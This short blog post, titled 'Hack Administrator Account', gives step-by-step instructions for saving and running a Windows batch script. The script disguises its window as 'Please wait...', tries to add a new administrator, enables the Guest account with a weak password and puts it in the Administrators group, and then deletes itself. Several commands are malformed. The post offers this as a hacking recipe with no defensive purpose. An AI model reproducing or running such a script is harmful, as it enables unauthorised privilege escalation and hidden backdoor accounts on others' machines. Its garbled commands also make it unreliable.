Friday, 15 August 2014

Hack Administrator Account


To Hack Administrator Account follow these steps:

1)

Open Note pad

2)

Copy all the code below

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


3)
Save the File as hacking.bat

4)

now Open the file and you are done with it.

No comments:

Post a Comment